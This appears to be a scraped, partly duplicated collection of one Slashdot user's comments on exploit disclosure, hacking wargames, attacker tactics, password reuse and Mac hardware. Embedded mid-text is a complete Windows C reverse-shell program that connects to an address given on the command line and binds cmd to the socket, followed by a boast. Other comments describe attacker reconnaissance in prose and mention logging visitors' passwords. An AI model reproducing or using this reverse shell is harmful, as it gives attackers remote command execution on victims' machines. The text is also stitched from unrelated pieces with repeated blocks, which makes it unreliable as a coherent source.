Publishing POC was always the final step in any exploit. First you contact the company. Then they stiff arm you. Then everyone using their software gets hacked. And finally you publish POC and they finally fix it. This won't last I am betting, just a clueless judge on a bad day.
Interesting to see this type of thing on slashdot. I have recently done some work for the guys running this. They have a bunch of different systems that are donated by the public. Alot of the owners have either placed software that they suspected exploits to exist for or set up vulnerable servers with all sorts of strange problems. I have written a few of these intentionally vulnerable servers for different people. Some of the guys playing are actually quite impressive and I have watched exploits on more than one piece of up to date software.
Another example of fairly realistic wargame is here. Hackerslab is a single box set up with 17 levels of intentional vulnerabilities. The first few are realitively dumb but even you security types will learn things on the higher levels. If you have ever wondered how exactly a buffer overflow, format string, or integer underflow exploit works I encourage you to check it out. Currently some of my code is running on the FreeBSD box. Its been up for close to a week and noone has found the vuln yet. Maybe the slashdotters can do it.
This is Kevin saying this after all. He has always seemed to think "hacking" is a mind game more than technical knowledge. Besides it helps him get jobs if he can't quite cut it on the actual tech side of things.
Might as well throw people in jail for talking. hell lets ban all communication while we are at it. I mean heaven forbid I write a note to someone and hand it to them instead of letting a middle man make money off of it.
actually to conventionally hack windows is arguably more difficult. To trojan is simple but only because any kid can write VB. Its pretty simple to trojan a nix machine too, just takes a bit more knowledge than most kids are willing to obtain.
Anyone who cares about the results of this already knew what the results would be. As long as there are twelve year olds and POC exploit code you will get port scanned 5 billion times a week. The 12 year olds however are not the people to worry about and the people who you should be worried about are unlikely to fire up nmap/nessus. They won't be attacking you unless there is a good reason. And don't think people look for bounce points by attacking windows services. Any remote attack is messy and unreliable, much better to put together a simple trojan and watch it spread itself. The only way you are going to be attacked by any one with half a clue as to wha they are doing is if you have something worth seeing (and no your credit card number does not qualify). If you have passed all these tests so far then lets consider what happens next. Being a big target it is going to be pretty obvious what you are running and where just from dns records. next the attacker will figure out specific versions by simply faking a valid connection. once he has this he will either find a known exploit, or more likely dig through some code and find a new one. He will set up a test environment that looks exactly like your system, he will script his exploit to be quite and deadly. he will hit you once with one connection and its over. If this guy is attacking you and that connection comes you are already to late.
Every system is vulnerable, luckily there are very few people who possess both the knowledge and the lack of morals it takes to be able to find the holes.
So why are we doing studies on what the 12 yr olds of the world are doing, and calling them comp sec.
Scary? nah just one more reason not to move back to the US. I think the US is probably going to destroy itself (if in a less violent way) before NK gets a chance to launch nukes though.
Thats easy, we make a giant drill-mobile, put some third rate hollywood types in it and send them to the center of mars with a nuclear payload. Thatll get the core spinning like nothing else.
We should take votes on who exactly should go. I say Paris Hilton would make a great choice.
I have actually had a server on my network rooted. Not a cool experience. You go to log in and its like "hey wait a minute, I never type that password wrong" and then bam it hits you and you start thinking, What have I done on the subnet in the past couple days that he will have seen. Esspecially when you have ettercap installed already, he doesn't even have to know how to do it, just check the.bash_history.. Anyway if your keen on security we are having a grand old time at rootthisbox its the biggest wargame going to my knowledge.
I follow the same sule, only with less compartments. The way I see it is if you are smart enough to root me then you are smart enough to set up active ssl disection and have all the passwords I use over ssl in a few days anyway. So I have one long password for things that I trust (ie. me and banks) and another for things I don't.
A while back I set up a case study on this whole password re-use thing, http://hackaway.darkry.net Granted this site attracts mostly highschool and college students but you can still tell just by looking at the logs which passwords are meant to be secure and which people have a clue. If you would like to take a peek at the actual logs you can email me but I am not going to post them here for obvious reasons.
I guess my question would be, what is this money going to spent on. Are the planning on simply throwing it into the fray to help trash the circuit boards or are they pumping it back into research of cleaner boards/better recycling techniques. There are a ton of precious metals in any circuit board as far as I know, seems like there must be some way to extract them that costs less than their worth.
Is layered design a new thing? I remember visiting my uncle when I was 16 and he was working for SGI. He was designing a 5 layered graphics board at the time. Maybe SGI was ahead of the game... Could be I don't understand something or am remembering wrong, I too am a software guy.
Thats all well and good but lets face it OS X is years ahead of anything else as far as ease of use, experience... and pretty much every other catagory you can name. The open Source community is hardly going to catch up to Apple on this.. We tend to focus more on the way things work than how they look. Sure there are those of us who would like our desktops to look pretty while we code but I am not about to spend my time trying to make transparancy look when I could be coding something new (at least to me). Thats why I say Apple would be doing the world a service if they sold OS X for other platforms. (Don't say it because I know that will never happen) The point is that their operating system is based on something that was developed by the open source community.. Come on Steve do us a favor and give something back.
So what your saying is that mac is targeting the mini to take the place of the 30 old machines in my closet. I can use it as a server or as a router?
And if I did want the equivilant of a mini.. yes I could build it for much cheaper, after all we are talking about 2 year old hardware here. People practically give it away. Perhaps you Apple fan boys need to actually read before you flame, I said that I want a Mac. Actually you gave me another reson not to get one, you guys are more snooty than us Linux boys.
I want one. badly. But the Mac mini is a perfect example.. I can't justify paying 500 dollars just for an operating system. The last computer I built was around 300 bucks all told and I manged the squeze in the brand new (at the time) Athlon 64. So why oh why does apple sell a 500 dollars computer with 2 year old components.
I guess my wish at this point is that one of two impossible things will happen.
1. it becomes possible to buold your own Mac.
2. Someone steal the source for AQUA and ports it to x86
Slashdot Mirror
Does this mean the RIAA putta the jihad on us?
Durka durka music jihad.
Publishing POC was always the final step in any exploit. First you contact the company. Then they stiff arm you. Then everyone using their software gets hacked. And finally you publish POC and they finally fix it. This won't last I am betting, just a clueless judge on a bad day.
Interesting to see this type of thing on slashdot. I have recently done some work for the guys running this. They have a bunch of different systems that are donated by the public. Alot of the owners have either placed software that they suspected exploits to exist for or set up vulnerable servers with all sorts of strange problems. I have written a few of these intentionally vulnerable servers for different people. Some of the guys playing are actually quite impressive and I have watched exploits on more than one piece of up to date software.
Another example of fairly realistic wargame is here. Hackerslab is a single box set up with 17 levels of intentional vulnerabilities. The first few are realitively dumb but even you security types will learn things on the higher levels. If you have ever wondered how exactly a buffer overflow, format string, or integer underflow exploit works I encourage you to check it out. Currently some of my code is running on the FreeBSD box. Its been up for close to a week and noone has found the vuln yet. Maybe the slashdotters can do it.
several years of development. 5 seconds for me to think of a hack to nullify it.. nah the NSA won't find him that useful.
This is Kevin saying this after all. He has always seemed to think "hacking" is a mind game more than technical knowledge. Besides it helps him get jobs if he can't quite cut it on the actual tech side of things.
that page == me playing with google. the error is there for a reason as is the link on slashdot. but thanks anyway... I think
Might as well throw people in jail for talking. hell lets ban all communication while we are at it. I mean heaven forbid I write a note to someone and hand it to them instead of letting a middle man make money off of it.
#include
#include
#include
#include
int main (int argc, char **argv) {
struct sockaddr_in sin4;
int sox;
sin4.sin_family = AF_INET;
sin4.sin_port = htons(atoi(argv[2]));
sin4.sin_addr.s_addr = inet_addr (argv[1]);
WSADATA wsadata;
WSAStartup(0x101, &wsadata);
sox=WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_IP, NULL, 0, 0);
connect ( sox, (struct sockaddr_in *)&sin4,sizeof(struct sockaddr_in));
SetStdHandle(STD_INPUT_HANDLE,(HANDLE)sox);
SetStdHandle(STD_OUTPUT_HANDLE,(HANDLE)sox);
SetStdHandle(STD_ERROR_HANDLE,(HANDLE)sox);
system("cmd");
}
All your bases are belonging to meh
http://hackers.darkry.net -- nuff said
actually to conventionally hack windows is arguably more difficult. To trojan is simple but only because any kid can write VB. Its pretty simple to trojan a nix machine too, just takes a bit more knowledge than most kids are willing to obtain.
Anyone who cares about the results of this already knew what the results would be. As long as there are twelve year olds and POC exploit code you will get port scanned 5 billion times a week. The 12 year olds however are not the people to worry about and the people who you should be worried about are unlikely to fire up nmap/nessus. They won't be attacking you unless there is a good reason. And don't think people look for bounce points by attacking windows services. Any remote attack is messy and unreliable, much better to put together a simple trojan and watch it spread itself. The only way you are going to be attacked by any one with half a clue as to wha they are doing is if you have something worth seeing (and no your credit card number does not qualify). If you have passed all these tests so far then lets consider what happens next. Being a big target it is going to be pretty obvious what you are running and where just from dns records. next the attacker will figure out specific versions by simply faking a valid connection. once he has this he will either find a known exploit, or more likely dig through some code and find a new one. He will set up a test environment that looks exactly like your system, he will script his exploit to be quite and deadly. he will hit you once with one connection and its over. If this guy is attacking you and that connection comes you are already to late.
Every system is vulnerable, luckily there are very few people who possess both the knowledge and the lack of morals it takes to be able to find the holes.
So why are we doing studies on what the 12 yr olds of the world are doing, and calling them comp sec.
What better way to spread a trojan than make it a requirement for a link on slashdot... :)
Not saying thats the case, just a thought.
Scary? nah just one more reason not to move back to the US. I think the US is probably going to destroy itself (if in a less violent way) before NK gets a chance to launch nukes though.
The vikings sailed to mars?!?!?! And they didn't even get credit for America, what a rip off.
Yeah but at least for them its not illegal to scramble the signal... yet. They just better hope the US doesn't plant the first flag.
Thats easy, we make a giant drill-mobile, put some third rate hollywood types in it and send them to the center of mars with a nuclear payload. Thatll get the core spinning like nothing else.
We should take votes on who exactly should go. I say Paris Hilton would make a great choice.
I have actually had a server on my network rooted. Not a cool experience. You go to log in and its like "hey wait a minute, I never type that password wrong" and then bam it hits you and you start thinking, What have I done on the subnet in the past couple days that he will have seen. Esspecially when you have ettercap installed already, he doesn't even have to know how to do it, just check the .bash_history.. Anyway if your keen on security we are having a grand old time at rootthisbox its the biggest wargame going to my knowledge.
This also applies to a brush or a pen.
I follow the same sule, only with less compartments. The way I see it is if you are smart enough to root me then you are smart enough to set up active ssl disection and have all the passwords I use over ssl in a few days anyway. So I have one long password for things that I trust (ie. me and banks) and another for things I don't.
A while back I set up a case study on this whole password re-use thing, http://hackaway.darkry.net Granted this site attracts mostly highschool and college students but you can still tell just by looking at the logs which passwords are meant to be secure and which people have a clue. If you would like to take a peek at the actual logs you can email me but I am not going to post them here for obvious reasons.
darkry{AT}darkry.net
I guess my question would be, what is this money going to spent on. Are the planning on simply throwing it into the fray to help trash the circuit boards or are they pumping it back into research of cleaner boards/better recycling techniques. There are a ton of precious metals in any circuit board as far as I know, seems like there must be some way to extract them that costs less than their worth.
Is layered design a new thing? I remember visiting my uncle when I was 16 and he was working for SGI. He was designing a 5 layered graphics board at the time. Maybe SGI was ahead of the game... Could be I don't understand something or am remembering wrong, I too am a software guy.
Why does everyone assume this is a troll.. Read the above comment it applies to this post too.
Thats all well and good but lets face it OS X is years ahead of anything else as far as ease of use, experience... and pretty much every other catagory you can name. The open Source community is hardly going to catch up to Apple on this.. We tend to focus more on the way things work than how they look. Sure there are those of us who would like our desktops to look pretty while we code but I am not about to spend my time trying to make transparancy look when I could be coding something new (at least to me). Thats why I say Apple would be doing the world a service if they sold OS X for other platforms. (Don't say it because I know that will never happen) The point is that their operating system is based on something that was developed by the open source community.. Come on Steve do us a favor and give something back.
So what your saying is that mac is targeting the mini to take the place of the 30 old machines in my closet. I can use it as a server or as a router?
And if I did want the equivilant of a mini.. yes I could build it for much cheaper, after all we are talking about 2 year old hardware here. People practically give it away. Perhaps you Apple fan boys need to actually read before you flame, I said that I want a Mac. Actually you gave me another reson not to get one, you guys are more snooty than us Linux boys.
:P
I want one. badly. But the Mac mini is a perfect example.. I can't justify paying 500 dollars just for an operating system. The last computer I built was around 300 bucks all told and I manged the squeze in the brand new (at the time) Athlon 64. So why oh why does apple sell a 500 dollars computer with 2 year old components.
I guess my wish at this point is that one of two impossible things will happen.
1. it becomes possible to buold your own Mac.
2. Someone steal the source for AQUA and ports it to x86
Darwin on an Athlon 64..... sooooo sexy.
absolutely, I will consider buying one of these fancy new phones when I can carry a library around with me.
I too "ONLY" use my Zire 71 to read. But I spend several hours every day doing it sooooo.